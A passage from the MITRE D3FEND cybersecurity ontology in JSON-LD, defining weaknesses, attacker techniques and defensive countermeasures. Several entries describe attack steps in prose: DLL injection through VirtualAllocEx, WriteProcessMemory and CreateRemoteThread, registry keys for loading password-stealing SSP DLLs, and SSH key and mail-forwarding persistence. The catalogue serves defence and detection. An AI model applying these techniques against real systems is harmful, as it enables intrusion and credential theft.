        "@id": "d3f:DigitalInformationBearer"
      },
      "skos:altLabel": "UI"
    },
    {
      "@id": "d3f:UserStartupScriptFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A user startup script file is a shortcut file that is executed when a user logs in and starts a session on the host.  These indicate applications the user wants started at login.  For Windows, these are typically found in the user's startup directory.",
      "rdfs:label": "User Startup Script File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExecutableScript"
        },
        {
          "@id": "d3f:UserLogonInitResource"
        }
      ]
    },
    {
      "@id": "d3f:CWE-124",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-124",
      "d3f:definition": "The product writes to a buffer using an index or pointer that references a memory location prior to the beginning of the buffer.",
      "d3f:synonym": "buffer underrun",
      "rdfs:label": "Buffer Underwrite ('Buffer Underflow')",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-786"
        },
        {
          "@id": "d3f:CWE-787"
        }
      ]
    },
    {
      "@id": "d3f:Reference-DLLInjectionViaLoadLibrary_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2013-10-002/"
      },
      "d3f:kb-abstract": "Microsoft Windows allows for processes to remotely create threads within other processes of the same privilege level. This functionality is provided via the Windows API CreateRemoteThread. Both Windows and third-party software use this ability for legitimate purposes. For example, the Windows process csrss.exe creates threads in programs to send signals to registered callback routines. Both adversaries and host-based security software use this functionality to inject DLLs, but for very different purposes. An adversary is likely to inject into a program to evade defenses or bypass User Account Control, but a security program might do this to gain increased monitoring of API calls. One of the most common methods of DLL Injection is through the Windows API LoadLibrary.\n\nAllocate memory in the target program with VirtualAllocEx\nWrite the name of the DLL to inject into this program with WriteProcessMemory\nCreate a new thread and set its entry point to LoadLibrary using the API CreateRemoteThread.\nThis behavior can be detected by looking for thread creations across processes, and resolving the entry point to determine the function name. If the function is LoadLibraryA or LoadLibraryW, then the intent of the remote thread is clearly to inject a DLL. When this is the case, the source process must be examined so that it can be ignored when it is both expected and a trusted process.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:SystemCallAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2013-10-002: DLL Injection via Load Library",
      "rdfs:label": "Reference - CAR-2013-10-002: DLL Injection via Load Library - MITRE"
    },
    {
      "@id": "d3f:T1569.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1569.003",
      "d3f:definition": "Adversaries may abuse systemctl to execute commands or programs. Systemctl is the primary interface for systemd, the Linux init system and service manager. Typically invoked from a shell, Systemctl can also be integrated into scripts or applications.",
      "rdfs:label": "Systemctl",
      "rdfs:subClassOf": {
        "@id": "d3f:T1569"
      }
    },
    {
      "@id": "d3f:FirmwareSensor",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Collects information on firmware installed on an Endpoint.",
      "d3f:monitors": {
        "@id": "d3f:Firmware"
      },
      "rdfs:label": "Firmware Sensor",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EndpointSensor"
        },
        {
          "@id": "_:Nfa16c0d7fdfb480aa561ca5277aab0f9"
        }
      ]
    },
    {
      "@id": "_:Nfa16c0d7fdfb480aa561ca5277aab0f9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Firmware"
      }
    },
    {
      "@id": "d3f:T1101",
      "@type": "owl:Class",
      "d3f:attack-id": "T1101",
      "d3f:definition": "Windows Security Support Provider (SSP) DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: <code>HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages</code> and <code>HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages</code>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1547.005",
      "rdfs:label": "Security Support Provider",
      "rdfs:seeAlso": {
        "@id": "d3f:T1547.005"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:NetworkTrafficCommunityDeviation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:NetworkTrafficCommunityDeviation"
      ],
      "d3f:analyzes": {
        "@id": "d3f:NetworkTraffic"
      },
      "d3f:d3fend-id": "D3-NTCD",
      "d3f:definition": "Establishing baseline communities of network hosts and identifying statistically divergent inter-community communication.",
      "d3f:kb-article": "## How it works\nHosts/users within a computer network are analyzed to identify communities of hosts which frequently communicate. Future communications between communities that don't usually communicate can then be detected.  For example, if a community of hosts that communicate in support of a company's finance division suddenly starts to access the code server usually accessed only by engineers, this may indicate unauthorized activity.\n\n## Considerations\n* Potential for false positives in very dynamic network environments.\n* Attackers that move low and slow may not differentiate their behavior enough to trigger an alert.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SystemForImplementingThreatDetectionUsingDailyNetworkTrafficCommunityOutliers_VECTRANETWORKSInc"
      },
      "rdfs:label": "Network Traffic Community Deviation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "_:Nece8e9578a9040178d34edd5e259f693"
        }
      ]
    },
    {
      "@id": "_:Nece8e9578a9040178d34edd5e259f693",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:Reference-TrustedAttestationProtocolUseCases",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://trustedcomputinggroup.org/wp-content/uploads/TCG_TNC_TAP_Use_Cases_v1r0p35_published.pdf"
      },
      "d3f:kb-article": "## Document Abstract\nThis specification defines the Trusted Platform Module (TPM) a device that enables trust in computing platforms in general. It is broken into parts to make the role of each part clear. All parts are required in order to constitute a complete standard. For a complete definition of all requirements necessary to build a TPM, the designer will need to use the appropriate platform-specific specification to understand all of the requirements for a TPM in a specific application or make appropriate choices as an implementer. Those wishing to create a TPM need to be aware that this specification does not provide a complete picture of the options and commands necessary to implement a TPM. To implement a TPM the designer needs to refer to the relevant platform-specific specification to understand the options and settings required for a TPM in a specific type of platform or make appropriate choices as an implementer.",
      "d3f:kb-reference-title": "Trusted Attestation Protocol Use Cases",
      "rdfs:label": "Reference - Trusted Attestation Protocol Use Cases"
    },
    {
      "@id": "d3f:cwe-kb-annotation",
      "@type": "owl:AnnotationProperty",
      "rdfs:label": "cwe-kb-annotation",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-annotation"
      }
    },
    {
      "@id": "d3f:CWE-394",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-394",
      "d3f:definition": "The product does not properly check when a function or operation returns a value that is legitimate for the function, but is not expected by the product.",
      "rdfs:label": "Unexpected Status Code or Return Value",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-754"
      }
    },
    {
      "@id": "d3f:modifies-part",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x modifies-part y: The entity x modifies a part of y.  [Note: This is a rolification property for the rule 'if one modifies a part of a whole, they modify the whole.'  Reasoning for this and similar semantics to come are under evaluation and not part of current d3fend inferences.]",
      "owl:propertyChainAxiom": {
        "@list": [
          {
            "@id": "d3f:modifies"
          },
          {
            "@id": "d3f:contains"
          }
        ]
      },
      "rdfs:label": "modifies-part",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-modify"
      }
    },
    {
      "@id": "d3f:Reference-SMBSessionSetups_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2013-09-003/"
      },
      "d3f:kb-abstract": "Account usage within SMB can be used to identify compromised credentials, and the hosts accessed with them.\n\nThis analytic monitors SMB activity that deals with user activity rather than file activity.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:AuthorizationEventThresholding"
        },
        {
          "@id": "d3f:IPCTrafficAnalysis"
        }
      ],
      "d3f:kb-reference-title": "CAR-2013-09-003: SMB Session Setups",
      "rdfs:label": "Reference - CAR-2013-09-003: SMB Session Setups - MITRE"
    },
    {
      "@id": "d3f:T1403",
      "@type": "owl:Class",
      "d3f:attack-id": "T1403",
      "d3f:definition": "ART (the Android Runtime) compiles optimized code on the device itself to improve performance. An adversary may be able to use escalated privileges to modify the cached code in order to hide malicious behavior. Since the code is compiled on the device, it may not receive the same level of integrity checks that are provided to code running in the system partition.(Citation: Sabanal-ART)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been deprecated.",
      "rdfs:label": "Modify Cached Executable Code - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobilePersistenceTechnique"
      },
      "skos:prefLabel": "Modify Cached Executable Code"
    },
    {
      "@id": "d3f:MouseInputDevice",
      "@type": "owl:Class",
      "d3f:definition": "A computer mouse (plural mice or mouses) is a hand-held pointing device that detects two-dimensional motion relative to a surface. This motion is typically translated into the motion of a pointer on a display, which allows a smooth control of the graphical user interface of a computer. In addition to moving a cursor, computer mice have one or more buttons to allow operations such as selection of a menu item on a display. Mice often also feature other elements, such as touch surfaces and scroll wheels, which enable additional control and dimensional input.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Computer_mouse"
      },
      "rdfs:label": "Mouse Input Device",
      "rdfs:seeAlso": {
        "@id": "dbr:Pointing_device"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:InputDevice"
      },
      "skos:altLabel": "Computer Mouse"
    },
    {
      "@id": "d3f:T1643",
      "@type": "owl:Class",
      "d3f:attack-id": "T1643",
      "d3f:definition": "Adversaries may generate outbound traffic from devices. This is typically performed to manipulate external outcomes, such as to achieve carrier billing fraud or to manipulate app store rankings or ratings. Outbound traffic is typically generated as SMS messages or general web traffic, but may take other forms as well.",
      "rdfs:label": "Generate Traffic from Victim - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileImpactTechnique"
      },
      "skos:prefLabel": "Generate Traffic from Victim"
    },
    {
      "@id": "d3f:CCI-001404_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system automatically audits account disabling actions.",
      "d3f:exactly": {
        "@id": "d3f:DomainAccountMonitoring"
      },
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-24T00:00:00"
      },
      "rdfs:label": "CCI-001404"
    },
    {
      "@id": "d3f:CWE-431",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-431",
      "d3f:definition": "A handler is not available or implemented.",
      "rdfs:label": "Missing Handler",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-691"
      }
    },
    {
      "@id": "d3f:T1114.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1114.003",
      "d3f:definition": "Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations.(Citation: US-CERT TA18-068A 2018) Furthermore, email forwarding rules can allow adversaries to maintain persistent access to victim's emails even after compromised credentials are reset by administrators.(Citation: Pfammatter - Hidden Inbox Rules) Most email clients allow users to create inbox rules for various email functions, including forwarding to a different recipient. These rules may be created through a local email application, a web interface, or by command-line interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2)(Citation: Mac Forwarding Rules)",
      "d3f:modifies": {
        "@id": "d3f:ApplicationConfiguration"
      },
      "rdfs:label": "Email Forwarding Rule",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1114"
        },
        {
          "@id": "_:N2b26ed2123d143ef99070bbd7eac458f"
        }
      ]
    },
    {
      "@id": "_:N2b26ed2123d143ef99070bbd7eac458f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationConfiguration"
      }
    },
    {
      "@id": "d3f:IA-0008",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0008",
      "d3f:definition": "Adversaries obtain a foothold by interacting with the spacecraft from platforms outside the authorized ground architecture. A “rogue external entity” is any actor-controlled transmitter or node, ground, maritime, airborne, or space-based, that can radiate or exchange traffic using mission-compatible waveforms, framing, or crosslink protocols. The technique exploits the fact that many vehicles must remain commandable and discoverable over wide areas and across multiple modalities. Using public ephemerides, pass predictions, and knowledge of acquisition procedures, the actor times transmissions to line-of-sight windows, handovers, or maintenance periods. Initial access stems from presenting traffic that the spacecraft will parse or prioritize: syntactically valid telecommands, crafted ranging/acquisition exchanges, crosslink service advertisements, or payload/user-channel messages that bridge into the command/data path.",
      "rdfs:label": "Rogue External Entity - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0008/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAInitialAccessTechnique"
      },
      "skos:prefLabel": "Rogue External Entity"
    },
    {
      "@id": "d3f:T1098.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1098.004",
      "d3f:definition": "Adversaries may modify the SSH <code>authorized_keys</code> file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The <code>authorized_keys</code> file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <code>&lt;user-home&gt;/.ssh/authorized_keys</code>.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under <code>/etc/ssh/sshd_config</code>.",
      "rdfs:label": "SSH Authorized Keys",
      "rdfs:subClassOf": {
        "@id": "d3f:T1098"
      }
    },
    {
      "@id": "d3f:One-timePassword",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:One-timePassword"
      ],
      "d3f:d3fend-id": "D3-OTP",
      "d3f:definition": "A one-time password is valid for only one user authentication.",
      "d3f:kb-article": "## How it works\n\nWhen a user initiates authentication, they are asked for a one-time password, often in addition to other credentials such as a traditional password or smart card. The one-time password may be from a list provided in advance, sent via a channel such as SMS or HTTPS to an app, or a generated token.\n\nIn the case of a physical token which generates one-time passwords incrementally based on time elapsed, that token device need not be connected to the internet. In different implementations, an administrator of the system, or a user with additional verification, can adjust for clock skew between the token and the verification system as needed.\n\n## Considerations\n\n### Compromise of delivery channel\n- SIM Swapping\n- Secure token visual compromise\n- Insecure delivery channel\n\n### Compromise of delivery device\nPhysical loss of One-time Password device.\n\n### Compromise of long-term backup codes\nThese are often provided in the form of a downloadable document with a regular name, which can be searched for in the case that the user forgets where they put them.  This digital file or printed document could be stolen.\nAdditionally, after the code file is printed, it could be recovered from the system printer spool unless the spooler cache is cleared.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-DigitalIdentityGuidelines800-63-3"
        },
        {
          "@id": "d3f:Reference-RFC2289-AOne-TimePasswordSystem"
        }
      ],
      "d3f:synonym": "OTP",
      "d3f:use-limits": {
        "@id": "d3f:Password"
      },
      "rdfs:label": "One-time Password",
      "rdfs:seeAlso": {
        "@id": "dbr:One-time_password"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PasswordRotation"
        },
        {
          "@id": "_:N89b2af276c19412c8bc79b0dd371f83e"
        }
      ]
    },
    {
      "@id": "_:N89b2af276c19412c8bc79b0dd371f83e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:use-limits"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Password"
      }
    },
    {
      "@id": "d3f:ATLASCollectionTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:AML.TA0009"
      },
      "rdfs:label": "Collection Technique - ATLAS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTechnique"
        },
        {
          "@id": "_:N6ee9b73f6844426b953a48cf86a15d8c"
        }
      ],
      "skos:prefLabel": "Collection Technique"
    },
    {
      "@id": "_:N6ee9b73f6844426b953a48cf86a15d8c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AML.TA0009"
      }
    },
    {
      "@id": "d3f:CWE-243",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-243",
      "d3f:definition": "The product uses the chroot() system call to create a jail, but does not change the working directory afterward. This does not prevent access to files outside of the jail.",
      "rdfs:label": "Creation of chroot Jail Without Changing Working Directory",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-573"
        },
        {
          "@id": "d3f:CWE-669"
        }
      ]
    },
    {
      "@id": "d3f:ConfigurationEvent",
      "@type": "owl:Class",
      "d3f:definition": "A discrete event that creates, applies, modifies, or deletes configuration resources to determine or alter the function of a system, device, application, or service.",
      "rdfs:label": "Configuration Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalEvent"
        },
        {
          "@id": "_:Ne3463f0f287942c5876d14662bf8b05e"
        }
      ]
    },
    {
      "@id": "_:Ne3463f0f287942c5876d14662bf8b05e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ConfigurationResource"
      }
    },
    {
      "@id": "d3f:Detect",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DefensiveTactic"
      ],
      "d3f:definition": "The detect tactic is used to identify adversary access to or unauthorized activity on computer networks.",
      "d3f:display-order": 1,
      "d3f:display-priority": 0,
      "rdfs:label": "Detect",
      "rdfs:subClassOf": {
        "@id": "d3f:DefensiveTactic"
      }
    },
    {
      "@id": "d3f:CWE-1328",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1328",
      "d3f:definition": "Security-version number in hardware is mutable, resulting in the ability to downgrade (roll-back) the boot firmware to vulnerable code versions.",
      "rdfs:label": "Security Version Number Mutable to Older Versions",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-285"
      }
    },
    {
      "@id": "d3f:AML.T0052",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0052",
      "d3f:definition": "Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.\n\nGenerative AI, including LLMs that generate synthetic text, visual deepfakes of faces, and audio deepfakes of speech, is enabling adversaries to scale targeted phishing campaigns. LLMs can interact with users via text conversations and can be programmed with a meta prompt to phish for sensitive information. Deepfakes can be used in impersonation as an aid to phishing.",
      "rdfs:label": "Phishing - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0052"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASInitialAccessTechnique"
      },
      "skos:prefLabel": "Phishing"
    },
    {
      "@id": "d3f:FileMetadataValueVerification",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:FileMetadataValueVerification"
      ],
      "d3f:analyzes": [
        {
          "@id": "d3f:FileFooterBlock"
        },
        {
          "@id": "d3f:FileHeaderBlock"
        }
      ],
      "d3f:d3fend-id": "D3-FMVV",
      "d3f:definition": "The process of checking specific static values within a file, such as file signatures or magic numbers, to ensure they match the expected values defined by the file format specification.",
      "d3f:description": "## How it works\n\nFile format specifications often define expected values for specific fields. A common example is the file signature, or magic number, which is used to quickly identify a file. Another example is found in the Compound Document Header of Microsoft Office files, where the 29th and 30th bytes identify the byte order, specifically 0xFFFE for little-endian. This technique verifies that the file's static values match the values of the declared file format's specification.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-CarvingContiguousandFragmentedFilesWithFastObjectValidation"
        },
        {
          "@id": "d3f:Reference-IntroductoryComputerForensics"
        }
      ],
      "rdfs:label": "File Metadata Value Verification",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FileFormatVerification"
        },
        {
          "@id": "_:N3ca3b338af8b429da101d1fc5e257a58"
        },
        {
          "@id": "_:Ne72a745530904316aacdce4fc56a9ca3"
        }
      ]
    },
    {
      "@id": "_:N3ca3b338af8b429da101d1fc5e257a58",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileFooterBlock"
      }
    },
    {
      "@id": "_:Ne72a745530904316aacdce4fc56a9ca3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileHeaderBlock"
      }
    },
    {
      "@id": "d3f:DivisiveClustering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-DC",
      "d3f:definition": "A divisive clustering approach is a hierarchical, top-down approach to clustering a dataset.",
      "rdfs:label": "Divisive Clustering",
      "rdfs:subClassOf": {
        "@id": "d3f:HierarchicalClustering"
      }
    },
    {
      "@id": "d3f:IA-0011",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0011",
      "d3f:definition": "Adversaries abuse peripherals and removable media that the spacecraft (or its support equipment) ingests during development, I&T, or on-orbit operations. Small satellites and hosted payloads frequently expose standard interfaces, USB, UART, Ethernet, SpaceWire, CAN, or mount removable storage for loading ephemerides, tables, configuration bundles, or firmware. A tainted device can masquerade as a trusted class (mass-storage, CDC/HID) or present crafted files that trigger auto-ingest workflows, file watchers, or maintenance utilities. Malware may be staged by modifying the peripheral’s firmware, seeding the images written by lab formatting tools, or swapping media during handling. Once connected, the device can deliver binaries, scripts, or malformed data products that execute under existing procedures. Because these interactions often occur during hurried timelines (checkouts, rehearsals, contingency maintenance), the initial execution blends with legitimate peripheral use while traversing a path already privileged to reach flight software or controllers.",
      "rdfs:label": "Auxiliary Device Compromise - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0011/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAInitialAccessTechnique"
      },
      "skos:prefLabel": "Auxiliary Device Compromise"
    },
    {
      "@id": "d3f:T1676",
      "@type": "owl:Class",
      "d3f:attack-id": "T1676",
      "d3f:definition": "Adversaries may abuse the “linked devices” feature on messaging applications, such as Signal and WhatsApp, to register the user’s account to an adversary-controlled device. By abusing the “linked devices” feature, adversaries may achieve and maintain persistence through the user’s account, may collect information, such as the user’s messages and contacts list, and may send future messages from the linked device.",
      "rdfs:label": "Linked Devices - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileCollectionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobilePersistenceTechnique"
        }
      ],
      "skos:prefLabel": "Linked Devices"
    },
    {
      "@id": "d3f:TFTPNetworkTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "TFTP Network Traffic is network traffic typically used to automatically transfer configuration or boot files between machines.",
      "rdfs:label": "TFTP Network Traffic",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:CWE-385",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-385",
      "d3f:definition": "Covert timing channels convey information by modulating some aspect of system behavior over time, so that the program receiving the information can observe system behavior and infer protected information.",
      "rdfs:label": "Covert Timing Channel",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-514"
      }
    },
    {
      "@id": "d3f:HumanInputDeviceFirmware",
      "@type": "owl:Class",
      "d3f:definition": "Firmware that is installed on an HCI device such as a mouse or keyboard.",
      "rdfs:label": "Human Input Device Firmware",
      "rdfs:seeAlso": [
        {
          "@id": "d3f:Firmware"
        },
        {
          "@id": "dbr:Human_interface_device"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:PeripheralFirmware"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_RA-5_5",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Vulnerability Monitoring and Scanning | Privileged Access",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:PlatformHardening"
      },
      "rdfs:label": "RA-5(5)"
    },
    {
      "@id": "d3f:Reference-www.biometric-solutions.com_keystroke-dynamics",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "http://www.biometric-solutions.com/keystroke-dynamics.html"
      },
      "d3f:kb-abstract": "Keystroke dynamics or typing dynamics refers to the automated method of identifying or confirming the identity of an individual based on the manner and the rhythm of typing on a keyboard. Keystroke dynamics is a behavioral biometric; this means that the biometric factor is 'something you do'.\n\nAlready during the second world war a technique known as The Fist of the Sender was used by military intelligence to distinguish based on the rhythm whether a morse code message was sent by ally or enemy. These days each household has at least one computer keyboard, making keystroke dynamics the easiest biometric solution to implement in terms of hardware.\n\nWith keystroke dynamics the biometric template used to identify an individual is based on the typing pattern, the rhythm and the speed of typing on a keyboard. The raw measurements used for keystroke dynamics are dwell time and flight time.",
      "d3f:kb-author": "Biometric Solutions",
      "d3f:kb-organization": "Biometric Solutions",
      "d3f:kb-reference-of": {
        "@id": "d3f:InputDeviceAnalysis"
      },
      "d3f:kb-reference-title": "Keystroke Dynamics",
      "rdfs:label": "Reference - http://www.biometric-solutions.com/keystroke-dynamics.html - biometric-solutions.com"
    },
    {
      "@id": "d3f:CWE-654",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-654",
      "d3f:definition": "A protection mechanism relies exclusively, or to a large extent, on the evaluation of a single condition or the integrity of a single object or entity in order to make a decision about granting access to restricted resources or functionality.",
      "d3f:synonym": "Separation of Privilege",
      "rdfs:label": "Reliance on a Single Factor in a Security Decision",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-657"
        },
        {
          "@id": "d3f:CWE-693"
        }
      ]
    },
    {
      "@id": "d3f:CWE-623",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-623",
      "d3f:definition": "An ActiveX control is intended for restricted use, but it has been marked as safe-for-scripting.",
      "rdfs:label": "Unsafe ActiveX Control Marked Safe For Scripting",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-267"
      }
    },
    {
      "@id": "d3f:d3fend-object-property",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "d3fend-object-property"
    },
    {
      "@id": "d3f:ATTACKICSEvasionTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:TA0103"
      },
      "rdfs:label": "Evasion Technique - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTechnique"
        },
        {
          "@id": "_:Ned80375ac77b46409a147ebcecab78c0"
        }
      ],
      "skos:prefLabel": "Evasion Technique"
    },
    {
      "@id": "_:Ned80375ac77b46409a147ebcecab78c0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0103"
      }
    },
    {
      "@id": "d3f:ARIMAModel",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-AM",
      "d3f:definition": "An autoregressive integrated moving average (ARIMA) model is a generalization of an autoregressive moving average (ARMA) model.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Autoregressive integrated moving average. [Link](https://en.wikipedia.org/wiki/Autoregressive_integrated_moving_average)",
      "d3f:synonym": "Autoregressive Integrated Moving Average Model",
      "rdfs:label": "ARIMA Model",
      "rdfs:subClassOf": {
        "@id": "d3f:TimeSeriesAnalysis"
      }
    },
    {
      "@id": "d3f:M1017",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:d3fend-comment": "Modeling user training is outside the scope of D3FEND.",
      "rdfs:label": "User Training"
    },
    {
      "@id": "d3f:DecoyFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DecoyFile"
      ],
      "d3f:d3fend-id": "D3-DF",
      "d3f:definition": "A file created for the purposes of deceiving an adversary.",
      "d3f:kb-article": "## How it works\nThe decoy file is made available as a local or network resource. Accesses to the file may be monitored. The files may be configurations, documents, executables, or other file types.\n\n\n## Considerations\nProperties of the file such as cryptographic checksums, file creation date, file modified date, file size, file owner etc may be modified to improve the credibility of the file.\n\n## Example\n* A CSV file with decoy user credentials is placed on a system. The system or network is then monitored to detect any accesses to the decoy files.",
      "d3f:kb-reference": [
        {
